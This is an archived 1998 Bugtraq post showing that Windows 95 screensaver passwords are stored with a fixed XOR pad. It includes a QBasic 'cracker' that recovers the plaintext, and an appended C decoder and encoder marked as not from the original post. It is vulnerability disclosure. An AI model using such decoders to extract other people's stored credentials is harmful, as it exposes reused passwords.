Bugtraq mailing list archives

Windows95/98(?) Screensavers


From: kmspill_km () INAME COM (CrazyLinux)
Date: Tue, 26 May 1998 23:31:47 +0200



I got the idea to explore a bit on the w95ss password in the registry
after seeing the bruteforce cracker (using tables of bytes).

(why this is important to bugtraq? loads of people use 1 password for
everything)

It's kinda simple. First hex-decode the bytes (like in WSFTP) then XOR
them with a pad. A basic prog follows (I was too lazy to get C off the
CD).

-cp


Feel free to recode it in C and post to the list.

Attachment: 95sscrk.bas

DECLARE FUNCTION DecryptByte! (bytes!, ya!)
DECLARE FUNCTION HexVal! (coder$)
DIM SHARED byte(16) AS INTEGER

CLS
PRINT "Crazydog's w95 screensaver cracker, basic version"
INPUT "Input char part of ScreenSave_Data(from registry):", code$

z = LEN(code$): IF z MOD 2 <> 0 THEN PRINT "Must be even # of chars!": END

ON ERROR GOTO 40

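' Walk the hex string two characters (one byte) at a time.
FOR y = 1 TO z STEP 2
balon = balon + 1  ' 1-based index of the current byte and of the pad entry
nibbleone$ = MID$(code$, y, 1): nibbletwo$ = MID$(code$, y + 1, 1)
mega = (HexVal(nibbleone$) * 16) + HexVal(nibbletwo$)
IF HexVal(nibbletwo$) < 0 THEN mega = -255  ' one if only.
IF mega < 0 THEN PRINT "That didn't make any sense.": END
' Index by byte number, not string position: byte(y) runs past byte(16)
' from the 9th character on and falls into the error handler.
byte(balon) = DecryptByte(mega, balon)
wilma$ = wilma$ + CHR$(byte(balon))
NEXT y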

PRINT "The code is: "; wilma$; " (case insensitive)"
END
40 PRINT "[unknown]": END

FUNCTION DecryptByte (bytes, ya)
DIM xorpattern(31) AS INTEGER
xorpattern(1) = &H48: xorpattern(2) = &HEE: xorpattern(3) = &H76
xorpattern(4) = &H1D: xorpattern(5) = &H67: xorpattern(6) = &H69
xorpattern(7) = &HA1: xorpattern(8) = &H1B: xorpattern(9) = &H7A
xorpattern(10) = &H8C: xorpattern(11) = &H47: xorpattern(12) = &HF8
xorpattern(13) = &H54: xorpattern(14) = &H95: xorpattern(15) = &H97
xorpattern(16) = &H5F
DecryptByte = bytes XOR xorpattern(ya)
END FUNCTION

FUNCTION HexVal (coder$)
coder$ = UCASE$(coder$)
SELECT CASE coder$
 CASE "0"
 whee = 0
 CASE "1"
 whee = 1
 CASE "2"
 whee = 2
 CASE "3"
 whee = 3
 CASE "4"
 whee = 4
 CASE "5"
 whee = 5
 CASE "6"
 whee = 6
 CASE "7"
 whee = 7
 CASE "8"
 whee = 8
 CASE "9"
 whee = 9
 CASE "A"
 whee = 10
 CASE "B"
 whee = 11
 CASE "C"
 whee = 12
 CASE "D"
 whee = 13
 CASE "E"
 whee = 14
 CASE "F"
 whee = 15
 CASE ELSE
 whee = -21
END SELECT

HexVal = whee

END FUNCTION
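
The post invites a C version. As an added example (not code from the original post), here is the same hex-decode-then-XOR step in C using the pad from the BASIC listing, together with the reverse direction, which shows the operation is its own inverse and so the stored value protects nothing. The function names and the `test` sample are constructed here; uppercasing on encode is an assumption taken from the post's "case insensitive" remark.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Fixed 16-byte pad, copied from the xorpattern() table in the post. */
static const unsigned char PAD[16] = {
    0x48, 0xEE, 0x76, 0x1D, 0x67, 0x69, 0xA1, 0x1B,
    0x7A, 0x8C, 0x47, 0xF8, 0x54, 0x95, 0x97, 0x5F
};

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = toupper(c);
    return (c >= 'A' && c <= 'F') ? c - 'A' + 10 : -1;
}

/* Hex-decode `hex`, XOR byte n with PAD[n]. Returns the length written to `out`
 * (NUL-terminated), or -1 on odd length, bad digit, >16 bytes, or small buffer. */
int ss_decode(const char *hex, char *out, size_t outlen) {
    size_t n;
    if (outlen == 0) return -1;
    for (n = 0; hex[2 * n] != '\0'; n++) {
        int hi = hexval((unsigned char)hex[2 * n]);
        int lo = hexval((unsigned char)hex[2 * n + 1]); /* NUL here: odd length */
        if (hi < 0 || lo < 0 || n >= sizeof PAD || n + 1 >= outlen) return -1;
        out[n] = (char)(((hi << 4) | lo) ^ PAD[n]);
    }
    out[n] = '\0';
    return (int)n;
}

/* The same XOR in the other direction (uppercasing is an assumption, see above). */
int ss_encode(const char *pw, char *hex, size_t hexlen) {
    size_t n;
    if (hexlen == 0) return -1;
    hex[0] = '\0';
    for (n = 0; pw[n] != '\0'; n++) {
        if (n >= sizeof PAD || 2 * n + 3 > hexlen) return -1;
        sprintf(hex + 2 * n, "%02X", (unsigned)(toupper((unsigned char)pw[n]) ^ PAD[n]));
    }
    return (int)n;
}

int main(void) {
    char hex[33], plain[17];
    if (ss_encode("test", hex, sizeof hex) < 0) return 1; /* constructed sample */
    if (ss_decode(hex, plain, sizeof plain) < 0) return 1;
    printf("%s -> %s\n", hex, plain);
    return 0;
}
```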

